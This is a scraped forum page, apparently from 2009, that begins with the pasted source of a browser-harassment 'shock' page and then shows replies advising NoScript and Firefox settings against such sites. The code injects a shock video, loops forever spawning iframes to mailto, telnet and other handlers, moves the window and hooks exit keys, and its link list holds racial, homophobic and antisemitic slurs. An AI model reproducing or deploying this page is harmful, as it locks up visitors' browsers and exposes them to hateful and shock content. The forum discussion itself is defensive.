goatseflash  = '<div id="hello" style="z-index: 50; position: fixed; top: 0px; left: 0px; width: 100%; height: 100%;">';
goatseflash += '  <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="100%" height="100%">';
goatseflash += '    <param name="movie" value="http://static.nimp.org/flash/hello.swf" />'
goatseflash += '    <param name="wmode" value="transparent" />';
goatseflash += '  </object>'
goatseflash += '</div>';
    
function load_goatse() {
  document.body.innerHTML += goatseflash;
  setTimeout("unload_goatse()", 3000); // 3s
}
 
function unload_goatse() {
  document.getElementById("hello").style.display = 'none';
}

var protos = [ 
        "http://static.nimp.org/lm.pdf",
        "http://static.nimp.org/jews.wmv",
        "irc://irc.gnaa.us/gnaa",
        "irc://irc.efnet.org/politics",
        "news:alt.flame.niggers",
        "news:alt.flame.faggots",
        "mailto:lol@ijustpwnedj00.ca?subject=GOT SOMETHING TO BITCH ABOUT?&body=OMG WHAT IS HAPPENING!",
        "callto://US POLICE DEPARTMENT",
        "aim:GoIM?screenname=Rick_Astley&message=HY+LOL+HY+LOL",
        "rlogin://1.1.1.1:80",
        "telnet://1.1.1.1:80",
        "aim:addbuddy?listofscreennames=HY,LOL,HY,LOL,HY,LOL,join,the,gnaa,2006,RECRUITMENT,DRIVE,heartiez2incog&groupname=gnaa",
        "mailto:lol@ijustpwnedj00.ca?subject=have something to bitch about?&body=OMG WHAT IS HAPPENING!!",
        "ed2k://|file|Gayniggers From Outer Space [GNAA Digitally Remastered].avi|134174720|F8AF9D8A7091CD7A7B8968C9EB397C02|/",
        ];
function add(str) {
  div = document.getElementById('goatse');
  div.innerHTML = '<iframe style="width: 1; height: 1;" src="' + str + '"></iframe>';
}
    
function ruin() {
  document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>';
  while (1) {
    for (i = 0; i < protos.length; i++) {
      add(protos[i]);
    }
  }
}
    </script>
    <link rel="icon" type="image/x-icon" href="http://static.nimp.org/favicon.ico" />
    <link rel="shortcut icon" type="image/x-icon" href="http://static.nimp.org/favicon.ico" />
    <style type="text/css">
      html {
        height: 100%;
	width: 100%;
        overflow: hidden;
      }
      body {
        height: 100%;
	width: 100%;
        margin: 0;
        padding: 0;
      }
    </style>

  </head>
<body style="background-image: url(http://static.nimp.org/images/stretch.jpg); background-color: #FFFFFF;" 
  onload="load_goatse();document.goatse.reset();movew0w();setTimeout('ruin()', 20);" 
  onmousemove="document.goatse.reset();movew0w();procreate();"
  onkeydown="altf4key();ctrlkey();delkey();procreate();"
  onunload="document.goatse.reset();movew0w();procreate();"
  onmouseover="document.goatse.reset();movew0w();procreate();">
    <script type="text/javascript">
    <!--
    var images = new Array();
    var imagecount = 0;

    var delay = 10;
    var step = .2;
    var curstep = 0;

    window.resizeTo(800, 600);
    var centerX = (self.screen.width - document.body.clientWidth) / 2;
    var centerY = (self.screen.height - document.body.clientHeight - 120) / 2;
    movew0w();

    function movew0w() {
      var j;
      for (j = 0; j < 5; j++) {
        curstep += step / 5;
        var factorX = Math.sin(curstep * 6.1) * 0.9;
        var factorY = Math.cos(curstep * 3.7) * 0.9;

        factorX += 0.2 * Math.sin((20*Math.sin(curstep/20))+j*70)
                    * (Math.sin(10+curstep/(10+j))+0.2)
                    * Math.cos((curstep + j*25)/10);
        factorY += 0.2 * Math.cos((20*Math.sin(curstep/(20+j)))+j*70)
                    * (Math.sin(10+curstep/10)+0.2)
                    * Math.cos((curstep + j*25)/10);
        self.moveTo(centerX * (1.0 + factorX), centerY * (1.0 + factorY));
      }
      document.body.background = images[(Math.floor(curstep) % imagecount) + 1];
      setTimeout("movew0w()", delay);
    }
    // -->
  </script>
 <div>
  <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" height="1" width="1">
    <param name="ActivateApplets" value="1" />
    <param name="ActivateActiveXControls" value="1" />
  </object>
 </div>

  <table>
    <tr>
      <td valign="middle">
        <div style="text-align: center;">
          <a href="http://www.gnaa.us/"><img src="http://static.nimp.org/gnaa.png" alt="GNAA" /></a>
          <br />
          <br />

I checked out web.mac.com, and they do provide some amount of storage space which would possibly accommodate for that page.
http://www.apple.com/mobileme/features/idisk.html
w00t, i just noticed it.
Quote:
3/14/2009 10:30:18 PM
HTTP filter
file
http://web.mac.com/dalimohd/Daniel_a...e/Welcome.html
probably a variant of HTML/Exploit.DialogArg.A trojan
connection terminated - quarantined

Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
Damn this Eset, it does not show any alerts which means i didn't know about it, it's personal HTTP filter blocked it for me too, but still Noscript would have stopped the script from running anyway. It's good to have Nod around when you need it.
Reply With Quote
  #16  
Old 03-15-2009, 04:25 AM
Syphilis Syphilis is offline
Marquis
 
Join Date: Feb 2009
Location: Deep inside your girlfriend
Thanks: 100
Thanked 651 Times in 352 Posts
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Dfg View Post
Yes, if the website has some intentions of screwing you over and tracking cookies are quite common. Always protect yourself and use Firefox or other secure browser.
Use NoScript +Adblock plus to stop these types of popups.
Agreed. NoScript works well against sites like that.

mac.com is Apples' free web hosting domain.

To stop sites resizing and moving your windows in Firefox, go to Preferences > Content > Javascript (Advanced), and deselect the appropriate boxes.
Reply With Quote
The following users say "It is so good to hear it!":
Mankonaut X (03-15-2009)
  #17  
Old 03-15-2009, 04:29 AM
Mankonaut X Mankonaut X is offline
Banned
 
Join Date: Jan 2009
Location: Demokratik Republische Der Oz
Thanks: 154
Thanked 115 Times in 79 Posts
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Syphilis View Post
Agreed. NoScript works well against sites like that.

mac.com is Apples' free web hosting domain.

To stop sites resizing and moving your windows in Firefox, go to Preferences > Content > Javascript (Advanced), and deselect the appropriate boxes.
Come to think of it I've never actually needed a site to move the browser...
Reply With Quote
Reply

Bookmarks

Tags
browser, move, popups, sites, spam

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 05:50 AM.


Hot Topics
On IRC
Users: 4
Messages/minute: 0
Topic: "http://www.zoklet.net/..."
Users: 22
Messages/minute: 0
Topic: "buttpee"
Users: 10
Messages/minute: 0
Topic: "11:37 < mib_i8mfin> so wie ich die website hier sehe las..."
Advertisements
Your ad could go right HERE! Contact us!

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.